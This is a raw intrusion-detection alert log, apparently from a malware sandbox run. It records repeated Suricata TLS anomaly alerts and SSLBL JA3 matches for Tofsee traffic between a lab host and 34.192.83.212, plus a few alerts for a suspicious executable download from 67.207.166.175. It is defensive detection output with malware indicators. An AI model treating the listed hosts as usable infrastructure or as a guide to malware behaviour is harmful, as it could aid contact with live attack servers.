TCP 192.168.56.101:49259 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49259 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49259 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49260 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49319 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49260 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49319 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49179 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49264 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49264 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49264 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49262 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49262 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49322 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49182 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49262 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49322 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49322 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49182 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49262 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49182 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49262 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49264 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49322 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49264 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49322 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49263 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49263 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49263 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49327 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49327 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49327 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49263 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49263 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49182 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49182 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49266 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49266 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49327 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49266 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49327 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49178 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49178 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49178 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49330 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49274 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49330 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49274 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49274 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49193 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49193 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49183 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49274 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49183 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49274 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49183 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49164 -> 67.207.166.175:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49294 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49164 -> 67.207.166.175:80 2016699 ET HUNTING Suspicious lsass.exe in URI Potentially Bad Traffic
TCP 192.168.56.101:49294 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49294 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49294 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49294 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 67.207.166.175:80 -> 192.168.56.101:49164 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.101:49296 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49296 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49296 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49211 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49296 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49211 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49296 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49211 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49330 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49211 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49211 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49307 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49307 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49307 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49330 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49215 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49330 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49215 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49215 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49309 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49309 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49309 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49331 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49331 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49331 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49223 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49223 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49310 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49223 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49310 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49310 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49331 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49331 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49223 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49223 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49310 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49310 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49341 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49224 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49341 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49224 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49341 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49311 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49224 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49311 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49311 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49224 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49224 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49311 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49311 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49232 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49232 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49341 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49232 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49315 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49341 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49315 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49315 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49315 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49237 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49349 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49237 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49349 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49315 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49237 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49349 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49237 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49349 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49237 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49349 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49324 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49324 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49324 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49193 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49379 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49242 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49379 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49242 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49379 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49324 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49242 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49269 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49269 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49269 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49195 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49269 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49195 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49244 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49195 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49244 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49244 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49379 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49379 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49195 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49195 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49382 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49382 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49382 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49206 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49206 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49206 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49269 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49324 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49382 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49382 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49244 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49244 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49326 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49326 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49326 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49392 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49392 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49245 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49392 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49245 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49245 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49206 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49206 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49245 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49245 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49208 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49394 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49208 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49394 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49208 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49249 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49394 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49249 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49249 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49208 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49208 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49270 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49249 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49270 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49249 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49270 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49212 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49212 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49212 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49394 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49254 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49394 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49326 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49254 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49326 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49254 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49254 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49254 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49334 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49334 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49334 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49396 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49267 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49267 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49396 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49396 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49267 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49193 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49193 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49267 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49267 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49198 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49198 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49198 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49268 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49396 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49198 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49396 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49334 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49198 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49334 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49398 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49398 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49202 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49212 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49268 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49202 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
